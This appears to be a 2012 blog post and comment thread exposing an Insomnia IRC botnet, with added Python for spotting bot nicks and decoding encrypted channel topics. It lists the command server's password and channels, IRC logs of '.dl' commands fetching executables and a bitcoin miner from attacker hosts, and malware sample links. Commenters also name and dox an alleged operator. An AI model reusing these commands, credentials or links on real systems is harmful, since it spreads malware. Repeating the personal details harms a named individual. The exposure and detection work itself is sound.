we.be.thu.gs (Insomnia bot hosted in the Netherlands, Amsterdam, Ecatel Ltd)

A guy posted in this thread http://www.exposedbotnets.com/2012/04/insomnia-irc-bot-v113-manual.html about another Insomnia botnet server; you can read the comments there for more.

Resolved : [we.be.thu.gs] To [80.82.79.21]

Bv1's Insomnia bot server
Server: we.be.thu.gs (SSL required to connect; use XChat, or install SSL support in mIRC, and accept his invalid certificate)
Port: 443
Password: fuckyou
To connect: /server we.be.thu.gs:+443
Channels:
#US
#CA
#RU
#BR
#b8896 306039

Local users: Current Local Users: 1732 Max: 2638
Global users: Current Global Users: 1741 Max: 2647

Now talking in #b8896
Topic On: [ #b8896 ] [ !acdaefc6865a0e54646f63ba8b894c5a383235a46b67 ]
Topic By: [ b ]
Modes On: [ #b8896 12] [ +smntrSMuNTk 306039 12]

More about the hacker:

[z] (ghfghgf@b.uni.net): b
* [z] ~#b8896
* [z] HTTP.1.1 :HTTP 1.1
* [z] is using a Secure Connection
* [z] idle 00:11:36, signon: Tue Apr 10 10:06:54
* [z] End of WHOIS list.
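WHOIS output like the block above, and the bot nick n{US|XP-32a}kjibmbk that shows up further down in the log, are the kind of artifacts an IRC operator or a network defender can match on. The Python below is an added example written for this post, not code from the original write-up, from the anonymous contributor, or from the bot: it runs over a handful of WHOIS and channel lines (the WHOIS lines are copied from this post, the two channel lines are constructed and marked as such in the code), picks out nicks that follow the {country|OS-arch} layout, and flags WHOIS entries whose ident/realname line reads "HTTP.1.1 :HTTP 1.1" or whose host starts with "HTTP-", as on BorBot below. The regexes and field names are mine, not the bot's.

```python
import re

# Sample lines: the "* [nick] ..." WHOIS lines are copied from this post; the two
# "<nick> text" channel lines are constructed (one bot nick, one ordinary user).
SAMPLE_LOG = """\
* [z] (ghfghgf@b.uni.net): b
* [z] ~#b8896
* [z] HTTP.1.1 :HTTP 1.1
* [z] is using a Secure Connection
* [BorBot] (BorBot@HTTP-AC028863.lsanca.fios.verizon.net): BorBot :BorBot
* [BorBot] @#BV1
* [BorBot] HTTP.1.1 :HTTP 1.1
* [BV1] (glmbrs@BV1): ...
* [BV1] is a Network Administrator
<n{US|XP-32a}kjibmbk> Attempting to perform commands from url: http://www.terror-squad.co/topic.txt.
<alice> hi all
"""

# Nick layout seen on this network: n{<country>|<os>-<arch><letter>}<random>
# (regex is my generalisation of the single nick on the page).
BOT_NICK_RE = re.compile(r"^n\{(?P<cc>[A-Z]{2})\|(?P<os>[^|}]+)\}(?P<rnd>[a-z0-9]+)$")
WHOIS_LINE_RE = re.compile(r"^\* \[(?P<nick>[^\]]+)\] (?P<rest>.*)$")
WHOIS_USER_RE = re.compile(r"^\((?P<ident>[^@]+)@(?P<host>[^)]+)\): (?P<real>.*)$")
CHAN_MSG_RE = re.compile(r"^<(?P<nick>[^>]+)> (?P<text>.*)$")


def parse_bot_nick(nick):
    """Return the country/OS/random fields of an Insomnia-style nick, else None."""
    m = BOT_NICK_RE.match(nick)
    return m.groupdict() if m else None


def triage(log_text):
    """Collect per-nick WHOIS facts and return the nicks that match bot markers.

    Markers (all taken from the WHOIS output in this post):
      - the ident/realname line "HTTP.1.1 :HTTP 1.1"
      - a host that starts with "HTTP-"
      - a nick in the {country|OS} layout
    Returns a sorted list of (nick, [reasons]) for every nick with at least one marker.
    """
    whois = {}
    for line in log_text.splitlines():
        m = WHOIS_LINE_RE.match(line)
        if m:
            nick, rest = m.group("nick"), m.group("rest")
            entry = whois.setdefault(nick, {"reasons": set()})
            u = WHOIS_USER_RE.match(rest)
            if u:
                entry.update(u.groupdict())
                if u.group("host").startswith("HTTP-"):
                    entry["reasons"].add("HTTP- host")
            elif rest == "HTTP.1.1 :HTTP 1.1":
                entry["reasons"].add("HTTP 1.1 realname")
            continue
        c = CHAN_MSG_RE.match(line)
        if c and parse_bot_nick(c.group("nick")):
            entry = whois.setdefault(c.group("nick"), {"reasons": set()})
            entry["reasons"].add("bot nick layout")
    findings = [(nick, sorted(e["reasons"])) for nick, e in whois.items() if e["reasons"]]
    return sorted(findings)


if __name__ == "__main__":
    for nick, reasons in triage(SAMPLE_LOG):
        print("%-22s %s" % (nick, ", ".join(reasons)))
```

On the sample above this flags z and BorBot on the realname marker (BorBot additionally on its HTTP- host) and the n{US|XP-32a}... nick on its layout, while BV1 and the constructed user alice are left alone. The realname check is exact on purpose: a looser match would also catch legitimate clients that mention HTTP in their gecos.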

Here are the samples
http://www.mediafire.com/?27a0thq2pzu9kp0 Password:virus

UPDATE:
New domains used by the same guy:
irc.bv1.co, which resolves to 68.178.232.99 (United States, Scottsdale, Godaddy.com Inc)
bv1.biz, which resolves to 176.31.32.148 (France, Paris, Ovh Systems)

irc.bv1.us, which is inactive for the moment

Channel:

Here is the pastebin log from our anonymous friend:

* Topic for #BV1 is: d3F6Q29zTyt3Nm5EcmNPb3dxekRwTU80dzdqRHZNSzJ3cVBDbzhPN3c3dkR1OEtpdzdqRHFjTyt3NzdEbzhPK3dxSER2OE85dzduRHJjT293cUxEcjhPandxUER1TU9qdzd6RHBjT3Z3cUxEdU1PMHc3akRzQT09fDk5ODYzMTQw
* Topic for #BV1 set by BV1 at Thu Apr 19 06:40:09 2012
* [BorBot] (BorBot@HTTP-AC028863.lsanca.fios.verizon.net): BorBot :BorBot
* [BorBot] @#BV1 
* [BorBot] HTTP.1.1 :HTTP 1.1
* [BorBot] is using a Secure Connection
* [BorBot] idle 11:49:41, signon: Tue Apr 24 10:05:08
* [BorBot] End of WHOIS list.
* [BV1] (glmbrs@BV1): ...
* [BV1] ~#BV1 ~#US 
* [BV1] HTTP.1.1 :HTTP 1.1
* [BV1] is a Network Administrator
* [BV1] is available for help.
* [BV1] is using a Secure Connection
* [BV1] idle 00:18:28, signon: Tue Apr 24 00:14:38
* [BV1] End of WHOIS list.


Topic for #us is: d3F6Q29zT213cXpDcjhPbHc2TER2OE80dzYzRG9NT2d3Ny9Ec0E9PXw5OTg2MzE0MA==

* Topic for #us set by Bv1 at Thu Mar 29 04:15:44 2012

we.be.thu.gs redirected to local server, and topics placed on correct channels.
On join of #BV1, bot visited http://terror-squad.co/topic.txt
Further encrypted topic in file: d3F6Q29zTzV3N3pDck1Pa3c3akR1TU84d3JiQ284S2p3N3ZEdThPN3dxTER1TU9wdzc3RHZzT2p3NzdDb2NPL3c3M0R1Y090dzZqQ29zT3Z3NlBDbzhPcXc2WERvTU9wd3I3Q29zT3B3N1REcWNLc3dyN0N0Y09xd3JuQ3VzSzF3NjNEcU1LOHdyN0N1OE91d3JUQ3Y4Syt3NnJEcjhPdnc2L0N2Y0svd3I3RHFjT3B3cnJDdXNPdHc2N0N1c0s3dzY3RHFNT3d3cXpDb3NPNXc3L0Ryc0tzdzZQRG9zT3d3cXpDb3NPL3c2UER2c080dzdEQ3JNS2l3NnJEdU1POHc3QT18OTk4NjMxNDA=

Bot then downloaded http://terror-squad.co/file2.exe, and joined #US, which was the country code received from the api.

<n{US|XP-32a}kjibmbk> Attempting to perform commands from url: http://www.terror-squad.co/topic.txt.
<n{US|XP-32a}kjibmbk> Bot file is already up to date: 29F569AD027B832FCCC132EE66AB67BD == 29F569AD027B832FCCC132EE66AB67BD

New action, as I write this up.
<BV1> .dl http://www.terror-squad.co/5302b1ac63e7e4c58c50555aa96d847c.exe
That's a bot that attempts to download a bitcoin miner.
http://malwr.com/analysis/c38456aa1b1f93fa9da88cb3653a6fd5/
From http://api.cld.me/FoX8/download/bitcoin-miner.exe
Too bad it's not there anymore.
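The two channel topics quoted in the log above can be taken apart without any key material. The following Python is an added example written for this post (it is not code from the original write-up, from the anonymous contributor, or from the bot): it peels the two base64 layers off the topic strings copied from the #BV1 and #us lines, separates the trailing numeric tag, and checks whether what is left is readable. The layout it assumes, base64(base64(ciphertext) + "|" + tag), is simply what these two samples decode to; the innermost layer stays ciphertext, since the post does not give the bot's key, and the comment about .NET string encoding is my inference from the commenter's remark that Insomnia is written in .NET.

```python
import base64

# Channel topics copied from the log above (#BV1 and #us on the same server).
TOPIC_BV1 = (
    "d3F6Q29zTyt3Nm5EcmNPb3dxekRwTU80dzdqRHZNSzJ3cVBDbzhPN3c3dkR1OEtpdzdqRHFj"
    "Tyt3NzdEbzhPK3dxSER2OE85dzduRHJjT293cUxEcjhPandxUER1TU9qdzd6RHBjT3Z3cUxE"
    "dU1PMHc3akRzQT09fDk5ODYzMTQw"
)
TOPIC_US = "d3F6Q29zT213cXpDcjhPbHc2TER2OE80dzYzRG9NT2d3Ny9Ec0E9PXw5OTg2MzE0MA=="


def decode_topic(topic: str) -> dict:
    """Strip the two base64 layers off an Insomnia-style topic string.

    Layout (inferred from these two samples, not documented anywhere in the post):
        base64( base64(ciphertext) + "|" + decimal tag )
    The ciphertext is returned as code points only; decrypting it would need the
    bot's key, which is not on the page.
    """
    outer = base64.b64decode(topic, validate=True).decode("ascii")
    if "|" not in outer:
        raise ValueError("no '|' separator: not the expected topic layout")
    inner_b64, tag = outer.rsplit("|", 1)
    if not tag.isdigit():
        raise ValueError("trailing tag is not decimal: %r" % tag)
    inner = base64.b64decode(inner_b64, validate=True)
    # In both samples the inner bytes are valid UTF-8 and every character lands in
    # the Latin-1 upper half (U+00A0..U+00FF).  That is what a run of bytes >= 0x80
    # looks like after a .NET (UTF-16) string is UTF-8 encoded (my inference), and
    # it is a strong hint that the payload is still enciphered rather than text.
    text = inner.decode("utf-8")
    cps = [ord(c) for c in text]
    return {
        "tag": tag,
        "cipher_len": len(cps),
        "codepoints": cps,
        "all_high_latin1": all(0xA0 <= cp <= 0xFF for cp in cps),
        "looks_plaintext": all(0x20 <= cp < 0x7F for cp in cps),
    }


def compare_topics(a: str, b: str) -> dict:
    """Side-by-side facts an analyst would note for two topics from one botnet."""
    ra, rb = decode_topic(a), decode_topic(b)
    common = 0
    for x, y in zip(ra["codepoints"], rb["codepoints"]):
        if x != y:
            break
        common += 1
    return {
        "same_tag": ra["tag"] == rb["tag"],
        "shared_prefix_len": common,  # identical leading ciphertext characters
        "lengths": (ra["cipher_len"], rb["cipher_len"]),
    }


if __name__ == "__main__":
    for name, t in (("#BV1", TOPIC_BV1), ("#us", TOPIC_US)):
        r = decode_topic(t)
        print("%-5s tag=%s len=%d plaintext=%s" % (name, r["tag"], r["cipher_len"], r["looks_plaintext"]))
    print(compare_topics(TOPIC_BV1, TOPIC_US))
```

Both topics carry the same trailing tag (99863140) and open with the same two ciphertext characters, which is consistent with one key and one command prefix being used across the channels; the #BV1 payload is 44 characters, the #us one 14. Anything that fails the layout checks (no separator, non-decimal tag, invalid base64) raises instead of returning a partial result, so a feed of topics can be triaged without mistaking an unrelated topic for a command.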

Samples are hosted here:
http://terror-squad.co/, which resolves to 80.82.64.71 (still Ecatel)
http://80.82.64.71/~terrorsq/

Credit for this goes to the anonymous guy from here: http://www.exposedbotnets.com/2012/04/insomnia-irc-bot-v113-manual.html

Hosting info:
http://whois.domaintools.com/80.82.79.21


39 Comments

Anonymous - April 18, 2012 at 8:06 pm

Here are the samples
http://www.mediafire.com/?27a0thq2pzu9kp0 Password:virus
facebook hacker.exe is either insomnia 2.0 or 2.10 and is unencrypted.
hannah sex tape.exe is probably insomnia 2.20, and is crypted and pumped up to 35 MB, probably to look more like a movie and to avoid virustotal.
Both connect to we.be.thu.gs channel #b8896 with password 306039. This means the auth host is most likely ghfghgf@b.uni.net

Anonymous - April 18, 2012 at 8:11 pm

Another note, Bv1 is the guy selling the bins on hackforums, and is selling this hosting as well. All the #US, #BR, #CA, etc channels belong to him, and the channel #b8896 belongs to the guy b, who bought the bin and hosting from him.

Pig - April 18, 2012 at 10:45 pm

job well done, everything is detailed from irc infos to the samples used to infect people
i'm adding the link to the post now
feel free to post nets anytime

Anonymous - April 18, 2012 at 10:54 pm

That looks like ngrbot, or are they the same bots(Insomnia-ngr)?

They seem to have the same functions and names.

Pig - April 18, 2012 at 11:10 pm

only the language is different, Insomnia is coded in .NET

Anonymous - April 19, 2012 at 1:27 am

I can post two more, just small shitty http nets.
http://www.mediafire.com/?f25869md9bv3q9d password: virus
Loader.exe is a .net http bot, that connects to global-carding.ru/gate.php. Used for ddosing and loading malware (mainly RATS). Most files to be installed are loaded from webcamchat4free.in.
Some packet captures of it in action http://www.mediafire.com/?t8obhi8jttvh1l5

3.exe is hardly worth mentioning. It connects to http://anonproducts.info/xx/gate.php. If you visit http://anonproducts.info/xx/, you'll see its stats. They may not be real, as the accessible command panel http://anonproducts.info/xx/command.php has a facebook clickjacking attempt set up on it, suggesting that it was exposed purposefully.
anonproducts.info is a HF java "driveby" site, which I have been documenting on virustotal with the tag #anonproducts
Both pretty shit, but you might find them interesting.

Pig - April 19, 2012 at 12:34 pm

a lot of people will find your posts interesting, believe me
and a lot of people will be pissed lol

Pig - April 19, 2012 at 1:08 pm

anonproducts.info is the domain used for the loader, i'm opening a new thread with panel pictures and your samples now

Anonymous - April 25, 2012 at 6:39 pm

Latest domain, bv1.biz, appears to have his legit contact info. Just thought I should point that out.

Pig - April 25, 2012 at 6:56 pm

yes i can see his domains from here http://whois.domaintools.com/176.31.32.148 lol
hosting in France Paris Ovh Systems
very nice find

Pig - April 25, 2012 at 7:56 pm

looks like this thread is getting a lot of attention from 4chan and they're posting personal infos of the botnet owner lol
http://boards.4chan.org/g/res/24442662

Anonymous - April 25, 2012 at 8:27 pm

Use this link so that people who see it after can view it. https://archive.installgentoo.net/g/thread/24442662

Pig - April 25, 2012 at 8:33 pm

a lot of information on that guy lol

Amonynous - April 25, 2012 at 11:16 pm

This same person appears to own and sell the somewhat infamous Blackshades RAT malware as well.

He seems to own a ton of domains and servers, and his name is indeed Brendan M. Johnston.

More info coming soon.

Anonymous - April 26, 2012 at 1:25 pm

Ecatel is part of the Russian nbn that is known to host spambots and other malware.

Nothing will happen, also to the guy above it's not hard to fake whois information.

Pig - April 26, 2012 at 4:10 pm

u think he's so smart to fake his infos ? lol

Anonymous - April 26, 2012 at 11:07 pm

Oh, I guess there were two botnets on that host.
http://www.myown.cryptic-hosting.com/build.rar connects to myown.cryptic-hosting.com/vip/admin/
http://anubis.iseclab.org/?action=result&task_id=1f3d54d838c017474d9cec1d0198b92a6&format=html
Maybe we should hold off on releasing all this and see how many we can find out before they notice us.

Anonymous - April 26, 2012 at 11:21 pm

It's the gift that keeps on giving. I don't even know what this is, but he wants it installed on something. http://dl.dropbox.com/u/73806662/project2.exe

Anonymous - April 27, 2012 at 12:06 am

I'll wait a while before posting this so I don't end up spamming this with 20 comments.
.dl http://dl.dropbox.com/u/73806662/project9.exe -t 20
http://dl.dropbox.com/u/76027986/BS-Server.exe -t 43200
He might be removing them from dropbox, so I'll zip them all up once he stops.

(8:38:55 PM) Zain: .dl http://dl.dropbox.com/u/73806662/maintttt.exe -t 43200
(8:39:53 PM) Zain: .dl http://dl.dropbox.com/u/73806662/test8888jhon.exe -t 43200
I think he's done now.
Here's everything I've got so far, from the dropbox or the site with the bots. http://www.mediafire.com/?656qprn0bqoadco
Pass is virus as usual.
Only one I couldn't get was BS-server.exe

Pig - April 27, 2012 at 10:43 am

http://myown.cryptic-hosting.com/vvip/ this is ùBOT
http://myown.cryptic-hosting.com/vvip/img/logo.png
the bs-server maybe blackshades so forget it
for the rest i'm checking them later
if u follow like this he'll prob give up and forget bots lol

Pig - April 27, 2012 at 10:55 am

microsoft.exe connects to horta21.zapto.org TCP port 39

the rest are not active
1horta21.zapto.org
2horta21.zapto.org
3horta21.zapto.org
4horta21.zapto.org
5horta21.zapto.org
6horta21.zapto.org

Pig - April 27, 2012 at 11:14 am

build.exe is maybe umbra loader or other delphi http malware
http://176.31.147.53/vip/admin/ this is not there anymore

Anonymous - April 27, 2012 at 4:47 pm

The new version of the bitcoin miner has shown up on terror-squad.co. It's 40895.exe and this time has a working miner download link. I can't seem to worker details though.

BV1 - April 28, 2012 at 6:06 am

Congrats on your hard work, you genuinely fucked me up quite a bit.

To those interested, I don't spread, it was a client of mine on 4chan I suppose, but I'm shutting the server down regardless.

Fuck dealing with this shit.

Pig - April 28, 2012 at 2:48 pm

u are welcome bv1 lol

Anonymous - April 28, 2012 at 4:30 pm

BV1 you seem pretty upset. Also, why were you installing on other people's bots?
Apr 28 02:58:17 .dl http://thu.gs/tesr3.exe
Just because they are hosted on your server doesn't mean you can just do what you please with them.

Pig - April 28, 2012 at 6:19 pm

this is always the case lol

Anonymous - April 28, 2012 at 6:26 pm

Posting yet another gift from this botnet. http://66.96.206.18/files1/Flash1.exe Connects to http://liilli.in/ has the user-Agent: InetHTTP/1.0
I'm not too sure on what it does as it crashes most of the processes on my vm and starts hammering google with http requests when I run it.

Pig - April 28, 2012 at 6:31 pm

i downloaded 2 exe files from this link, that's why it took some min to show your post lol

Pig - April 28, 2012 at 7:26 pm

Resolved : [thu.gs] To [80.82.64.71]
this is the domain posted by the anonymous guy, inside u have some samples http://thu.gs

Anonymous - April 28, 2012 at 9:24 pm

Blah blah blah botnet http://dl.dropbox.com/u/73806662/testandro.exe
Connects to img196-imageshack.us/pannel/image.php
Note the lack of sub-domain.
Downloaded dl.dropbox.com/u/76205929/rk.cmd.dll
Dunno what for.
Then downloaded gwassnet.co.cc/NoTouch.exe
Which is a self extracting rar archive bitcoin miner.
svchost2.exe -o http://eu.triplemining.com:8344 -u trap258_gwas -p himom
111
0

Pig - April 28, 2012 at 9:43 pm

very nice shot lol
i'm opening a new thread for this

BV1 - April 28, 2012 at 11:21 pm

That's from me? Or unrelated. Don't recognize it.

Anonymous - April 29, 2012 at 2:14 am

They are known to steal bots from their customers, last time it happened it was regarding the rat they are selling(BS rat)

After that it was cracked and posted.

Anonymous - April 29, 2012 at 11:11 pm

Don't you think there would be many more bots if they stole bots? This is a couple hundred bots, they have thousands of customers. They should have tens of thousands of bots.

Pig - April 29, 2012 at 11:52 pm

don't worry, it's a question of time for other domains to be listed in this blog :-)

Anonymous - April 30, 2012 at 3:57 am

If you read up it's a known fact they steal bots and had a little function implemented into the BSrat that allowed them to send commands to your bots without you knowing.

Also they would be sending to multiple servers.

Pig - May 12, 2012 at 7:47 pm

looks like BV1's infos are exposed already http://hpaste.org/68250

Anonymous - May 16, 2012 at 4:00 pm

^ i lold.

What a retard, puts real info on whois.
